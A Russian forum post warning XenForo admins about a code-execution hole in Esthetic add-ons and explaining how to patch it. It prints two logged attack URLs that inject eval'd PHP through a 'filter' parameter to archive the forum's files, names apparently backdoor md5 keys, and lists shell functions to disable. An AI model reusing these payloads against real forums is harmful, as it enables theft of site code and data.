Решил апнуть эту тему;)
Нахожусь уже продолжительное время на форумах посвящённых тематике XenForo.И всё больше удивляет одержимость новичков в обвешивании своих форумов разного рода платёжными системами , баннерами с рекламой и хайдами.Ладно хер с ним,что форум кривой и на нём нет никакой инфы,но ведь ставят всё подряд,совершенно не заботясь о безопасности форума и его пользователей.Поэтому хочу вернуться к вопросу поднятому Олегом в этой теме,а именно про аддоны известного Виоделя (estheticlabs).
Его хайд и складчина пользуются ОГРОМНЕЙШЕЙ популярностью.Но никто не хочет задуматься об уязвимостях присутствующих в них.
Фикc аддонов esthetic от слива форума
В аддонах Esthetic обнаружилась дырка позволяющая выполнить любой код и слить форум.
Форум сливается примерно такими запросами:
passthru() has been disabled for security reasons
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
["url"] => string(264) "http://вас сайт/бла/бла/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=die(passthru(%27tar%20-cvvzf%20foo.tar.gz%20./library%27));"
["_GET"] => array(2) {
["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
["query"] => string(49) "die(passthru('tar -cvvzf foo.tar.gz ./library'));"
}
["_POST"] => array(0) {
}
}
RecursiveDirectoryIterator::__construct(./cgi): failed to open dir: Permission denied
library/Esthetic/CS/Model/Thread.php(50) : runtime-created function(1) : eval()'d code:1
Содержимое запроса
array(3) {
["url"] => string(601) "http://ваш сайт/threads/тут ссылка на складчину/?filter=$request=new+Zend_Controller_Request_Http();eval($request-%3EgetParam(%22query%22));&query=$zip=new%20ZipArchive;$zip-%3Eopen(%27backup.zip%27,ZipArchive::CREATE);$files=new%20RecursiveIteratorIterator(new%20RecursiveDirectoryIterator(%27./%27),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files%20as%20$name=%3E$file){$filePath%20=%20$file-%3EgetRealPath();$zip-%3EaddFile($filePath);}$zip-%3Eclose();"
["_GET"] => array(2) {
["filter"] => string(78) "$request=new Zend_Controller_Request_Http();eval($request->getParam("query"));"
["query"] => string(283) "$zip=new ZipArchive;$zip->open('backups.rar',ZipArchive::CREATE);$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator('./'),RecursiveIteratorIterator::LEAVES_ONLY);foreach($files as $name=>$file){$filePath = $file->getRealPath();$zip->addFile($filePath);}$zip->close();"
}
["_POST"] => array(0) {
}
}
Теперь перейдем к лечению дырок на примеру плагина хайда от конторы esthetic
Открываем файл:
library/Esthetic/EBBC/ControllerPublic/Thread.php
Находим:
case '54626eee0bcb90ab43c7917eb49f2344'
и удаляем вторую строку
case 'a6746afee9fa4e6e4901943d47f272bf''
либо генерируем свой md5 код и вставлем вместо этих двух.Остальное плагины латаются по аналогии
Потом идем в файл php.ini который находится на вашем сервере,либо хостинге и ищем
строчку
disable_functions и заменяем на:
disable_functions="popen,exec,system,passthru,proc_open,shell_exec
Взято с programmisty.net
И ещё информация по теме:
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
Тэги:Esthetic Collaborative Shopping
,Esthetic Simple Payments,Esthetic Extended BB-Codes,HIDE esthetic
.extended.bb-codes,скачать бесплатно